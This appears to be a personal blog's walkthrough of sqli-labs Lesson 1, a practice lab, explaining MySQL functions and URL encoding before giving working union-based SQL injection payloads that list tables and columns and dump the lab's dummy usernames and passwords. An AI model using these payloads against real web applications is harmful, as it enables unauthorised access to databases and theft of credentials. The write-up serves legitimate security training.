sqli-labs less1
First, the basics of MySQL injection.
URL encoding:
- A URL may only contain ASCII letters, digits and a few punctuation characters; anything else has to be percent-encoded.
- Encodings that come up constantly in SQL injection: space %20, single quote %27, double quote %22, hash %23. The hash is the one that bites: an unencoded # is treated by the browser as the start of the URL fragment and is never sent to the server, so the MySQL comment terminator has to be written as %23 in the address bar.
Commonly used MySQL system tables and functions:
- The system database information_schema holds the metadata of every database. Its tables table describes tables; the columns used most are table_schema (database name) and table_name (table name). Its columns table describes columns; the columns used most are column_name (column name) and table_name (table name).
- concat joins its arguments into one string:

```sql
select concat(1,2,3,4,5);
+-------------------+
| concat(1,2,3,4,5) |
+-------------------+
| 12345             |
+-------------------+
```

- concat_ws does the same with a separator (the first argument):

```sql
select concat_ws(':',1,2,3,4,5);
+--------------------------+
| concat_ws(':',1,2,3,4,5) |
+--------------------------+
| 1:2:3:4:5                |
+--------------------------+
```

- group_concat joins the values from several result rows into a single row, which is what lets one injected query return every table name at once. The bare name tables works here only because the current database happens to be information_schema (the database() call below shows this); from any other database write information_schema.tables:

```sql
select group_concat(table_name) from tables where table_schema="security";
+-------------------------------+
| group_concat(table_name)      |
+-------------------------------+
| emails,referers,uagents,users |
+-------------------------------+
```

- char turns ASCII codes (decimal or hex) into characters, a way to produce quotes and other characters without typing them literally:

```sql
select char(0x23,0x27,41,42,126);
+---------------------------+
| char(0x23,0x27,41,42,126) |
+---------------------------+
| #')*~                     |
+---------------------------+
```

- user() returns the current account, database() the current database, and version() the server version string (which also identifies the DBMS, here MariaDB):

```sql
select CONCAT_WS(CHAR(32,58,32),user(),database(),version());
+--------------------------------------------------------+
| CONCAT_WS(CHAR(32,58,32),user(),database(),version())  |
+--------------------------------------------------------+
| [email protected] : information_schema : 10.1.32-MariaDB |
+--------------------------------------------------------+
```
Less 1: string-based injection

The page says to pass a numeric id as the parameter. First try id=' and see whether it errors:

It does. The error message:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 0,1' at line 1

The quoted fragment shows that the parameter is wrapped in single quotes, i.e. it is handled as a string, and that the query ends in LIMIT 0,1. Next, find the number of columns with a union: a union select with the wrong number of columns fails with "The used SELECT statements have a different number of columns", while union select 1,2,3 succeeds, so the query has 3 columns.

id=0 is used because the table has no row with id=0, so the only row the page displays is the one coming from the union branch. The ' closes the open quote in the query, and the comment %23 (#) swallows the trailing ' LIMIT 0,1. Result:

Welcome Dhakkan Your Login name:2 Your Password:3
Now query the table names of the current database:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
This returns the table names of the current database:
Welcome Dhakkan Your Login name:emails,referers,uagents,users Your Password:3
Next, the column names of the users table:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
Result:
Welcome Dhakkan Your Login name:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password Your Password:3
The first three names (USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS) do not belong to security.users: the query filtered only on table_name, so it also matched the users table in performance_schema. Adding and table_schema=database() to the where clause leaves just id, username and password.
The final payload dumps the username and password columns of users with group_concat, following the same pattern as the two queries above. Result:
Welcome Dhakkan Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
—— soporbear.github.io/2018/05/27